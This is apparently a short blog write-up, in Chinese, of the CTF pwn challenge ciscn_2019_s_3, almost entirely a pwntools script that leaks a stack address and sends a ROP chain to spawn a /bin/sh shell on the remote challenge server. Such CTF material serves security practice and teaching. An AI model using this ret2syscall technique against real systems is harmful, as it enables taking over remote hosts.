pwn | ciscn_2019_s_3
x64 ret2syscall
主要参考:https://blog.csdn.net/github_36788573/article/details/103541178
感觉ret2syscall比较灵活,哎。
from pwn import *  # pwntools: remote(), p64(), u64(), context
# CTF writeup script (ciscn_2019_s_3, "x64 ret2syscall" per the page title).
# Log every byte sent and received so the exchange can be followed.
context.log_level = 'debug'
# p = process('./ciscn_s_3')   # local target, left disabled by the author
# Remote challenge instance as given on the page.
p = remote('node4.buuoj.cn',25448)
# Addresses in the challenge binary, labelled by the author; the binary
# is not on the page, so the labels cannot be checked from here.
main=0x0004004ED
execv=0x04004E2
pop_rdi=0x4005a3
pop_rbx_rbp_r12_r13_r14_r15=0x40059A
mov_rdxr13_call=0x0400580
sys=0x00400517
# First payload: 16 bytes of '/bin/sh\0' followed by the `main` address.
pl1=b'/bin/sh\x00'*2+p64(main)
p.send(pl1)
# Discard 0x20 bytes of the reply, then unpack the next 8 bytes as a
# little-endian value and subtract 280; the author calls the result `sh`.
# NOTE(review): recv(0x20) returns *up to* 0x20 bytes, so this assumes
# the service sends at least that much in one read — confirm.
p.recv(0x20)
sh=u64(p.recv(8))-280
print(hex(sh))
# Second payload: the same 16-byte prefix, then the labelled addresses
# and 8-byte values (zeros and sh+0x50, then sh) laid out in sequence.
pl2=b'/bin/sh\x00'*2+p64(pop_rbx_rbp_r12_r13_r14_r15)+p64(0)*2+p64(sh+0x50)+p64(0)*3
pl2+=p64(mov_rdxr13_call)+p64(execv)
pl2+=p64(pop_rdi)+p64(sh)+p64(sys)
p.send(pl2)
# Hand the connection over to the terminal.
p.interactive()
From: https://www.cnblogs.com/Mz1-rc/p/16972593.html